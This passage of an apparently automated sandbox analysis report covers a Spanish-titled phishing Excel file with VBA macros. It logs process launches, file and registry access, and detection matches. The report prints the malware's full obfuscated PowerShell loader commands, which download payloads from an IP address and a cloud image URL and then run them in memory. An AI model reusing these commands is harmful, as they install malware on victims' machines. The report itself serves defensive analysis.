sICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovalsJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89A7352E7_2_000007FE89A7352E
        Source: Orden_de_Compra_Nmero_6782929219.xlsOLE indicator, VBA macros: true
        Source: 54330000.0.drOLE indicator, VBA macros: true
        Source: Orden_de_Compra_Nmero_6782929219.xlsStream path 'MBD00068A10/\x1Ole' : https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshifte+*ablk.yn'aKMnG`|M`&%rda</g*;[A-yci]%8)K@AP@B_vZaaG72ocZ6RKgZzxpLexRQAehYuWnE7H0kEQs9c2eh4a7pcJQ2fO1npjHV585RJ1Ia5ueBRN7aDy21TNJuvq1MvmyFBuq0KQRzcqvnvgqq6UQ1kWT?M4?E]K\`&K&
        Source: 54330000.0.drStream path 'MBD00068A10/\x1Ole' : https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshifte+*ablk.yn'aKMnG`|M`&%rda</g*;[A-yci]%8)K@AP@B_vZaaG72ocZ6RKgZzxpLexRQAehYuWnE7H0kEQs9c2eh4a7pcJQ2fO1npjHV585RJ1Ia5ueBRN7aDy21TNJuvq1MvmyFBuq0KQRzcqvnvgqq6UQ1kWT?M4?E]K\`&K&
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2095
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2062
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2095
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2062
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2095Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2062Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2095
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2062
        Source: Process Memory Space: powershell.exe PID: 4092, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 3832, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.phis.troj.expl.evad.winXLS@38/51@23/3
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\54330000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR863F.tmpJump to behavior
        Source: Orden_de_Compra_Nmero_6782929219.xlsOLE indicator, Workbook stream: true
        Source: 54330000.0.drOLE indicator, Workbook stream: true
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3.......................-..............Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Ek....}..w.....-......\.......................(.P.....t.......|.......................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................-......}..w.............=p.....O.Ek......o.....(.P.....t.......|.......................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Ek....}..w.....-......\.......................(.P.....t.......|.......................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................-......}..w.............=p.....O.Ek......o.....(.P.....t.......|.......................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....h.......N.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..=p.....O.Ek......o.....(.P.....t.......|.......h....... .......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................-......}..w.............=p.....O.Ek......o.....(.P.....t.......|.......................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....t.......|.......h.......8.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................-......}..w.............=p.....O.Ek......o.....(.P.....t.......|.......................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...|.......h.......F.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................-......}..w.............=p.....O.Ek......o.....(.P.....t.......|...............l.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........-......}..w.............=p.....O.Ek......o.....(.P.....t.......|.......h...............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................-..............0........Wl.....}..w............@E......^...............(.P.....t.......|.......................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................-.......................Wl.....}..w............@E......^...............(.P.....t.......|.......................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m..............................................................3......................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P..... ...............................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............8.......8.......@"......(.P..... ...............................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................WU.l....}..w............\.......................(.P..... ...............(...............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................r.e.s.o.l.v.e.d.:. .'.p.a.s.t.e...e.e.'."..l.....zN.....(.P..... .......................*.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................WU.l....}..w............\.......................(.P..... ...............(...............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.6.3......T.l.....zN.....(.P..... .......................$.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............@w;......T.l.....zN.....(.P..... ...............................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............@w;......T.l.....zN.....(.P..... ...............................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............@w;......T.l.....zN.....(.P..... ...............................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............@w;......T.l.....zN.....(.P..... .......................T.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w............@w;......T.l.....zN.....(.P..... ...............................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................`..l....}..w............\.......................(.P.....X.......,.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............W........l............(.P.....X.......,.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................`..l....}..w............\.......................(.P.....X.......,.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............W........l............(.P.....X.......,.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....H.......N.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...W........l............(.P.....X.......,.......H....... .......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............W........l............(.P.....X.......,.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....X.......,.......H.......8.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............W........l............(.P.....X.......,.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...,.......H.......F.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............W........l............(.P.....X.......,...............l.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w..............W........l............(.P.....X.......,.......H...............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................0....4...Wl.....}..w............@E......^...............(.P.....X.......,.......h...............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .....................................4...Wl.....}..w............@E......^...............(.P.....X.......,.......h...............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m......m.......................m.......m.......................3.......................m..............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.............D.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................m......}..w............8.......8.......@"......(.P.............D.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................%..l....}..w.....m......\.......................(.P.............D.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................r.e.s.o.l.v.e.d.:. .'.p.a.s.t.e...e.e.'."..l.....v8.....(.P.............D.......h.......*.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.6.3........l.....v8.....(.P.............D.......h.......$.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................m......}..w.............s%........l.....v8.....(.P.............D.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................m......}..w.............s%........l.....v8.....(.P.............D.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................m......}..w.............s%........l.....v8.....(.P.............D.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................m......}..w.............s%........l.....v8.....(.P.............D...............T.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........m......}..w.............s%........l.....v8.....(.P.............D.......h...............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................%..l....}..w.....m......\.......................(.P.............D.......................................
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: Orden_de_Compra_Nmero_6782929219.xlsReversingLabs: Detection: 13%
        Source: Orden_de_Compra_Nmero_6782929219.xlsVirustotal: Detection: 14%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAg